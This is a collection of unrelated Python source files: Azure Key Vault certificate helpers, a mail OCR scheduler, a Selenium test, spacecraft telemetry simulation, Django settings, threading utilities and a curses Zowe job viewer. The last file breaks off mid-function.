def _get_vault_uri_and_resource_group_name(cli_ctx, vault):
client = keyvault_client_factory(cli_ctx).vaults
vault_resource_group_name = vault.id.split('/')[4]
v = client.get(vault_resource_group_name, vault.name)
vault_uri = v.properties.vault_uri
return vault_uri, vault_resource_group_name
def _safe_get_vault(cli_ctx, resource_group_name, vault_name):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
try:
vault = key_vault_client.get(resource_group_name, vault_name)
return vault
except CloudError as ex:
if ex.error.error == 'ResourceNotFound':
return None
raise
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
def _get_thumbprint_from_secret_identifier(cli_ctx, vault, secret_identifier):
secret_uri = urlparse(secret_identifier)
path = secret_uri.path
segment = path.split('/')
secret_name = segment[2]
secret_version = segment[3]
vault_uri_group = _get_vault_uri_and_resource_group_name(cli_ctx, vault)
vault_uri = vault_uri_group[0]
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
cert_bytes = secret.value
x509 = None
import base64
decoded = base64.b64decode(cert_bytes)
try:
x509 = crypto.load_pkcs12(decoded).get_certificate()
except (ValueError, crypto.Error):
pass
if not x509:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
if not x509:
raise Exception('invalid certificate')
thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
return thumbprint
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(cli_ctx, vault_base_url, certificate_name, certificate_data,
disabled=False, password=None, certificate_policy=None, tags=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
import binascii
certificate_data = open(certificate_data, 'rb').read()
x509 = None
content_type = None
try:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
# if we get here, we know it was a PEM file
content_type = 'application/x-pem-file'
try:
# for PEM files (including automatic endline conversion for
# Windows)
certificate_data = certificate_data.decode(
'utf-8').replace('\r\n', '\n')
except UnicodeDecodeError:
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except (ValueError, crypto.Error):
pass
if not x509:
try:
if password:
x509 = crypto.load_pkcs12(
certificate_data, password).get_certificate()
else:
x509 = crypto.load_pkcs12(certificate_data).get_certificate()
content_type = 'application/x-pkcs12'
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except crypto.Error:
raise CLIError(
'We could not parse the provided certificate as .pem or .pfx. '
'Please verify the certificate with OpenSSL.')
not_before, not_after = None, None
if x509.get_notBefore():
not_before = _asn1_to_iso8601(x509.get_notBefore())
if x509.get_notAfter():
not_after = _asn1_to_iso8601(x509.get_notAfter())
cert_attrs = CertificateAttributes(enabled=not disabled,
not_before=not_before,
expires=not_after)
if certificate_policy:
secret_props = certificate_policy.get('secret_properties')
if secret_props:
secret_props['content_type'] = content_type
elif certificate_policy and not secret_props:
certificate_policy['secret_properties'] = SecretProperties(
content_type=content_type)
else:
certificate_policy = CertificatePolicy(
secret_properties=SecretProperties(content_type=content_type))
logger.info("Starting 'keyvault certificate import'")
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
result = client_not_arm.import_certificate(cli_ctx=cli_ctx,
vault_base_url=vault_base_url,
certificate_name=certificate_name,
base64_encoded_certificate=certificate_data,
certificate_attributes=cert_attrs,
certificate_policy=certificate_policy,
tags=tags,
password=password)
logger.info("Finished 'keyvault certificate import'")
return result
def _download_secret(cli_ctx, vault_base_url, secret_name, pem_path, pfx_path, secret_version=''):
client = _get_keyVault_not_arm_client(cli_ctx)
secret = client.get_secret(vault_base_url, secret_name, secret_version)
secret_value = secret.value
if pem_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
f_pem = open(pem_path, 'wb')
f_pem.write(crypto.dump_privatekey(
crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, cert))
f_pem.close()
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pem_path):
os.remove(pem_path)
raise ex
if pfx_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
with open(pfx_path, 'wb') as f:
f.write(decoded)
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pfx_path):
os.remove(pfx_path)
raise ex
def _get_default_policy(cli_ctx, subject):
if subject.lower().startswith('cn') is not True:
subject = "CN={0}".format(subject)
return _default_certificate_profile(cli_ctx, subject)
def _default_certificate_profile(cli_ctx, subject):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
ActionType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#ActionType')
KeyUsageType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#KeyUsageType')
IssuerParameters = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.issuer_parameters#IssuerParameters')
KeyProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_properties#KeyProperties')
LifetimeAction = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.lifetime_action#LifetimeAction')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
X509CertificateProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.x509_certificate_properties#X509CertificateProperties')
Trigger = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.trigger#Trigger')
Action = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.action#Action')
template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
key_type=u'RSA',
key_size=2048,
reuse_key=True),
secret_properties=SecretProperties(
content_type=u'application/x-pkcs12'),
x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
KeyUsageType.data_encipherment,
KeyUsageType.digital_signature,
KeyUsageType.key_encipherment,
KeyUsageType.key_agreement,
KeyUsageType.key_cert_sign],
subject=subject,
validity_in_months=12),
lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
action=Action(action_type=ActionType.auto_renew))],
issuer_parameters=IssuerParameters(
name=u'Self',),
attributes=CertificateAttributes(enabled=True))
return template
def _create_self_signed_key_vault_certificate(cli_ctx, vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
cert_attrs = CertificateAttributes(enabled=not disabled)
logger.info("Starting long-running operation 'keyvault certificate create'")
if validity is not None:
certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
client = _get_keyVault_not_arm_client(cli_ctx)
client.create_certificate(
vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
# otherwise loop until the certificate creation is complete
while True:
check = client.get_certificate_operation(
vault_base_url, certificate_name)
if check.status != 'inProgress':
logger.info("Long-running operation 'keyvault certificate create' finished with result %s.",
check)
break
try:
time.sleep(10)
except KeyboardInterrupt:
logger.info("Long-running operation wait cancelled.")
raise
except Exception as client_exception:
message = getattr(client_exception, 'message', client_exception)
import json
try:
message = str(message) + ' ' + json.loads(
client_exception.response.text)['error']['details'][0]['message'] # pylint: disable=no-member
except: # pylint: disable=bare-except
pass
raise CLIError('{}'.format(message))
pem_output_folder = None
if certificate_output_folder is not None:
os.makedirs(certificate_output_folder, exist_ok=True)
pem_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pem')
pfx_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pfx')
_download_secret(cli_ctx, vault_base_url, certificate_name,
pem_output_folder, pfx_output_folder)
return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
def _get_keyVault_not_arm_client(cli_ctx):
from azure.cli.core._profile import Profile
version = str(get_api_version(cli_ctx, ResourceType.DATA_KEYVAULT))
def get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile(cli_ctx=cli_ctx).get_login_credentials(resource)[0]._token_retriever() # pylint: disable=protected-access
client = KeyVaultClient(KeyVaultAuthentication(get_token), api_version=version)
return client
def _create_keyvault(cmd,
cli_ctx,
resource_group_name,
vault_name,
location=None,
sku=None,
enabled_for_deployment=True,
enabled_for_disk_encryption=None,
enabled_for_template_deployment=None,
no_self_perms=None, tags=None):
from azure.cli.core._profile import Profile
from azure.graphrbac.models import GraphErrorException
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
graph_client = GraphRbacManagementClient(cred,
tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
subscription = profile.get_subscription()
VaultCreateOrUpdateParameters = cmd.get_models('VaultCreateOrUpdateParameters', resource_type=ResourceType.MGMT_KEYVAULT)
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
KeyVaultSku = cmd.get_models('Sku', resource_type=ResourceType.MGMT_KEYVAULT)
AccessPolicyEntry = cmd.get_models('AccessPolicyEntry', resource_type=ResourceType.MGMT_KEYVAULT)
Permissions = cmd.get_models('Permissions', resource_type=ResourceType.MGMT_KEYVAULT)
CertificatePermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#CertificatePermissions')
KeyPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#KeyPermissions')
SecretPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#SecretPermissions')
KeyVaultSkuName = cmd.get_models('SkuName', resource_type=ResourceType.MGMT_KEYVAULT)
if not sku:
sku = KeyVaultSkuName.standard.value
if no_self_perms:
access_policies = []
else:
permissions = Permissions(keys=[KeyPermissions.get,
KeyPermissions.create,
KeyPermissions.delete,
KeyPermissions.list,
KeyPermissions.update,
KeyPermissions.import_enum,
KeyPermissions.backup,
KeyPermissions.restore],
secrets=[SecretPermissions.get,
SecretPermissions.list,
SecretPermissions.set,
SecretPermissions.delete,
SecretPermissions.backup,
SecretPermissions.restore,
SecretPermissions.recover],
certificates=[CertificatePermissions.get,
CertificatePermissions.list,
CertificatePermissions.delete,
CertificatePermissions.create,
CertificatePermissions.import_enum,
CertificatePermissions.update,
CertificatePermissions.managecontacts,
CertificatePermissions.getissuers,
CertificatePermissions.listissuers,
CertificatePermissions.setissuers,
CertificatePermissions.deleteissuers,
CertificatePermissions.manageissuers,
CertificatePermissions.recover])
try:
object_id = _get_current_user_object_id(graph_client)
except GraphErrorException:
object_id = _get_object_id(graph_client, subscription=subscription)
if not object_id:
raise CLIError('Cannot create vault.\n'
'Unable to query active directory for information '
'about the current user.\n'
'You may try the --no-self-perms flag to create a vault'
' without permissions.')
access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
object_id=object_id,
permissions=permissions)]
properties = VaultProperties(tenant_id=tenant_id,
sku=KeyVaultSku(name=sku),
access_policies=access_policies,
vault_uri=None,
enabled_for_deployment=enabled_for_deployment,
enabled_for_disk_encryption=enabled_for_disk_encryption,
enabled_for_template_deployment=enabled_for_template_deployment)
parameters = VaultCreateOrUpdateParameters(location=location,
tags=tags,
properties=properties)
client = keyvault_client_factory(cli_ctx).vaults
return client.create_or_update(resource_group_name=resource_group_name,
vault_name=vault_name,
parameters=parameters)
# pylint: disable=inconsistent-return-statements
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.signed_in_user.get()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return None
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return None
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return None
if len(accounts) > 1:
logger.warning("Multiple users principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return None
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
if subscription['user']:
if subscription['user']['type'] == 'user':
return _get_object_id_by_upn(graph_client, subscription['user']['name'])
if subscription['user']['type'] == 'servicePrincipal':
return _get_object_id_by_spn(graph_client, subscription['user']['name'])
logger.warning("Unknown user type '%s'",
subscription['user']['type'])
else:
logger.warning('Current credentials are not from a user or service principal. '
'Azure Key Vault does not work with certificate credentials.')
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
if spn:
return _get_object_id_by_spn(graph_client, spn)
if upn:
return _get_object_id_by_upn(graph_client, upn)
return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
cluster_name,
admin_password,
certificate_thumbprint,
vault_id,
certificate_id,
reliability_level,
admin_name,
cluster_size,
durability_level,
vm_sku,
os_type,
linux):
parameter_file, _ = _get_template_file_and_parameters_file(linux)
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
parameters['clusterLocation']['value'] = cluster_location
parameters['clusterName']['value'] = cluster_name
parameters['adminUserName']['value'] = admin_name
parameters['adminPassword']['value'] = admin_password
parameters['certificateThumbprint']['value'] = certificate_thumbprint
parameters['sourceVaultvalue']['value'] = vault_id
parameters['certificateUrlvalue']['value'] = certificate_id
parameters['reliabilityLevel']['value'] = reliability_level
parameters['nt0InstanceCount']['value'] = int(cluster_size)
parameters['durabilityLevel']['value'] = durability_level
parameters['vmSku']['value'] = vm_sku
parameters['vmImageSku']['value'] = os_type
if "Datacenter-Core-1709" in os_type:
parameters['vmImageOffer']['value'] = 'WindowsServerSemiAnnual'
return parameters
def _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file):
cli_ctx = cli_ctx
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
logger.info('Found primary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
output_file = result[3]
else:
logger.info('Primary certificate parameters are not present in parameters file')
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
logger.info('Found secondary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
else:
if SEC_SOURCE_VAULT_VALUE not in parameters and SEC_CERTIFICATE_THUMBPRINT not in parameters and SEC_CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Secondary certificate parameters are not present in parameters file')
else:
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
return parameters, output_file
def _modify_template(linux):
_, template_file = _get_template_file_and_parameters_file(linux)
template = get_file_json(template_file)
return template
|
__main__.py
|
from threading import Thread
import sched, time
from .config import get_config
from .util import error
from .fetcher import fetch_attachements
from .uploader import upload
from .ocr import ocr_attachments
s = sched.scheduler(time.time, time.sleep)
def main():
try:
conf = get_config()
print("Configuration successfully parsed")
except Exception as e:
error("Invalid configuration: " + str(e))
print("Starting mailscan at poll interval of %i seconds..." % conf['pollInterval'])
s.enter(0, 1, executor, (conf,))
s.run(True)
def executor(conf):
thread = Thread(target=app, args=(conf,))
s.enter(conf['pollInterval'], 1, executor, (conf,)) # Repeat ...
thread.start()
def app(conf):
attachements = fetch_attachements(conf) # Get attachements
attachements = ocr_attachments(conf, attachements)
upload(conf, attachements) # Upload attachements
if __name__ == '__main__':
main()
|
test_selenium.py
|
import re
import time
import threading
import unittest
from selenium import webdriver
from app import create_app, db
from app.models import Role, User, Post
class SeleniuTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
#launch Firefox
try:
cls.client = webdriver.Chrome()
except:
pass
if cls.client:
cls.app = create_app('testing')
cls.app_context = cls.app.app_context()
cls.app_context.push()
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel('ERROR')
# create database, and fill it up with some faked data
db.create_all()
Role.insert_roles()
User.generate_fake(10)
Post.generate_fake(10)
# add administrater
admin_role = Role.query.filter_by(permissions=0xff).first()
admin = User(email='john@example.com',
username='john', password='cat',
role=admin_role, confirmed=True)
db.session.add(admin)
db.session.commit()
# launch Flask server in a thread
threading.Thread(target=cls.app.run).start()
# give the server a second to ensure it is up
time.sleep(1)
@classmethod
def tearDownClass(cls):
if cls.client:
# close Flask server and browser
cls.client.get('http://localhost:5000/shutdown')
cls.client.close()
# destroy database
db.drop_all()
db.session.remove()
#delete program context
cls.app_context.pop()
def setup(self):
if not self.client:
self.skipTest('web browser not available')
def tearDwon(self):
pass
def test_admin_home_page(self):
# enter homepage
self.client.get('http://localhost:5000/')
self.assertTrue(re.search('Hello,\s+Stranger!', self.client.page_source))
# enter login page
self.client.find_element_by_link_text('Log In').click()
self.assertTrue('<h1>Login</h1>' in self.client.page_source)
# login
self.client.find_element_by_name('email').send_keys('john@example.com')
self.client.find_element_by_name('password').send_keys('cat')
self.client.find_element_by_name('submit').click()
self.assertTrue(re.search('Hello,\s+john!', self.client.page_source))
# enter userdata page
self.client.find_element_by_link_text('Profile').click()
self.assertTrue('<h1>john</h1>' in self.client.page_source)
|
emvirtual.py
|
#!/usr/bin/python
import json
import logging
import sys
import time
from subsystems.emgps import emGps
from subsystems.emimu import emImu
from subsystems.emsensors import emSensors
from subsystems.emtelemetry import emTelemetry
from random_words import LoremIpsum
from threading import Thread
class emVirtual(object):
def __init__(self):
logging.info('Spacecraft Virtual')
self.mode = "virtual"
self.altitude = None
self.temperature = None
self.sealevelpressure = None
self.pressure = None
self.roll = None
self.pitch = None
self.yaw = None
self.latitude = None
self.longitude = None
self.altitudegps = None
self.satellites = None
self.speed = None
self.track = None
self.li = LoremIpsum()
self.emgpsfd = emGps(self.mode)
self.emimu = emImu(self.mode)
self.emsensors = emSensors(self.mode)
self.emtelemetry = emTelemetry(self.mode)
threadDemoExecute = Thread(target=self.emVirtualExecute)
threadDemoExecute.start()
threadDemoTelemetry = Thread(target=self.emVirtualTelemetry)
threadDemoTelemetry.start()
def emVirtualExecute(self):
self.emgpsfd.start()
try:
while True:
self.latitude, self.longitude, self.altitudegps, self.satellites, self.speed, self.track = self.emgpsfd.emGpsData()
self.roll, self.pitch, self.yaw = self.emimu.emImuData()
self.altitude, self.pressure, self.sealevelpressure, self.temperature = self.emsensors.emSensorsData()
time.sleep(1)
except (StopIteration, KeyboardInterrupt, SystemExit):
pass
def emVirtualTelemetry(self):
try:
while True:
data = {}
data['alive'] = "1"
data['altitude'] = self.altitude
data['pressure'] = self.pressure
data['sealevelpressure'] = self.sealevelpressure
data['temperature'] = self.temperature
data['roll'] = self.roll
data['pitch'] = self.pitch
data['yaw'] = self.yaw
data['latitude'] = self.latitude
data['longitude'] = self.longitude
data['altitudegps'] = self.altitudegps
data['satellites'] = self.satellites
data['speed'] = self.speed
data['track'] = self.track
data['message'] = self.li.get_sentence()
self.emtelemetry.emTelemetryDweetIo(data)
time.sleep(1)
except (StopIteration, KeyboardInterrupt, SystemExit):
pass
def emVirtualRecord(self):
datage = ("{0} " "{1} " "{2} " "{3} " \
"{4} " "{5} " "{6} " "{6} ".format(
self.latitude, self.longitude, self.altitude, self.pressure, \
self.temperature, self.roll, self.pitch, self.yaw))
logging.warning(datage)
# End of File
|
shared_array_test.py
|
import multiprocessing as mp
import numpy as np
import ctypes
def work(pid):
if pid==5:
s_array[0] = 5
array[0] = 5
# rawarray to nparray via np.asarray
def raw2np(raw):
class Empty: pass
array = Empty()
array.__array_interface__ = {
'data': (raw._wrapper.get_address(), False),
'typestr': 'i',
'descr': None,
'shape': (raw._wrapper.get_size(),),
'strides': None,
'version': 3
}
return np.asarray(array).view(dtype=np.int32)
if __name__ == "__main__":
raw_array= mp.RawArray(ctypes.c_int,
np.asarray([1], dtype=np.int32)
)
# np.frombuffer gives the view without copying the data
# this means that we can use s_array as shaerd array,
# and this conversion is the fastes way.
s_array = np.frombuffer(raw_array, dtype=np.int32)
# alternative way
array = raw2np(raw_array)
print s_array.__array_interface__['data'][0]
print raw_array._wrapper.get_address()
print ("%d %d")%(s_array, array[0])
workers = []
for pid in xrange(mp.cpu_count()):
p = mp.Process(target=work, args=(pid,))
workers.append(p)
p.start()
[p.join() for p in workers]
print ("%d %d")%(s_array, array[0])
|
settings_20210906111953.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:20").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(5)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
dispatch.py
|
import threading
import Queue
import traceback
def request_results(func, args=(), kwargs={}):
# prepare request
results = Queue.Queue()
func_args = (args, kwargs)
instruct = func, func_args, results
# ask the thread
worker = threading.Thread(target=_compute_results_, args=instruct)
worker.daemon = True
worker.start()
# return the empty results, it is up to the GUI to wait for it
return results
def after_completion(window, queue, func):
def check():
try:
result = queue.get(block=False)
except:
window.after(1000, check)
else:
func(result)
window.after(100, check)
#######################
## Internal use only ##
#######################
def _compute_results_(func, func_args, results):
"internal use only, this function is run entirely in the new worker thread"
args, kwargs = func_args
try: _results = func(*args, **kwargs)
except Exception as errmsg:
_results = Exception(traceback.format_exc() )
results.put( _results )
#print "put",_results
|
main.py
|
import curses
import queue
import string
import subprocess
import threading
import time
from datetime import datetime
state = {}
threads = []
result_pipeline = queue.Queue()
instr_pipeline = queue.Queue()
def execute_zowe_workload():
"""
This function is carried out in a separate thread as the zowe calls take a while to complete and
we want to try and block as little as possible.
:return:
"""
global instr_pipline
global result_pipeline
try:
t = threading.currentThread()
current_instruction = None
last_run_instruction = 0
item = None
while getattr(t, "do_run", True):
if not instr_pipeline.empty():
item = instr_pipeline.get(False)
if current_instruction is not None or item is not None:
if item != current_instruction or \
last_run_instruction == 0 or \
time.time() - last_run_instruction > 10:
if item is not None:
current_instruction = item
item = None
msg = None
if "delete" in current_instruction:
output = execute_zowe_command(current_instruction)
msg = output
current_instruction = "zowe jobs list jobs"
output = execute_zowe_command(current_instruction)
jobs = parse_job_list(output)
result_pipeline.put({"type": "jobs", "data": jobs, "timestamp": time.time(), "editor.msg": msg})
last_run_instruction = time.time()
time.sleep(0.25)
except Exception as err:
print(err)
def request_job_list():
cmd = "zowe zos-jobs list jobs"
execute_zowe_command(cmd)
def execute_zowe_command(cmd: str):
process = subprocess.run(cmd.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE, text="text")
return process.stdout
def add_shortcut_keys_based_on_job_type(jobs):
global state
keys = state["shortcut_keys"]
menu = ""
for key in jobs.keys():
menu = menu + "[{}]{} ".format(key[0], key[1:])
keys[key[0].lower()] = key
state["shortcut_keys"] = keys
def create_top_menu_shortcuts(jobs):
menu = ""
for key in jobs.keys():
menu = menu + "[{}]{} ".format(key[0], key[1:])
return menu
def update_top_shortcuts_menu(jobs):
add_shortcut_keys_based_on_job_type(jobs)
menu = create_top_menu_shortcuts(jobs)
state["window_tree"]["top_menu"].bkgd(' ', curses.color_pair(2))
state["window_tree"]["top_menu"].addstr(0, 1, menu, curses.color_pair(2))
state["window_tree"]["top_menu"].refresh()
def update_main_window(jobs):
"""
Update the main window listing
:param jobs:
:return:
"""
state["window_tree"]["main"].clear()
heading = "{:3} {:10}{:10}{:15}{:10}".format("Job", "ID", "Type", "Name", "Status")
state["window_tree"]["main"].addstr(2, 1, heading)
horizontal_line = u"\u2015" * int(state["window_tree"]["main"].getmaxyx()[1])
state["window_tree"]["main"].addstr(3, 0, horizontal_line)
cur_y = 4
if state["job_type"] in jobs:
for job in jobs[state["job_type"]]:
try:
state["window_tree"]["main"].addstr(cur_y, 1,
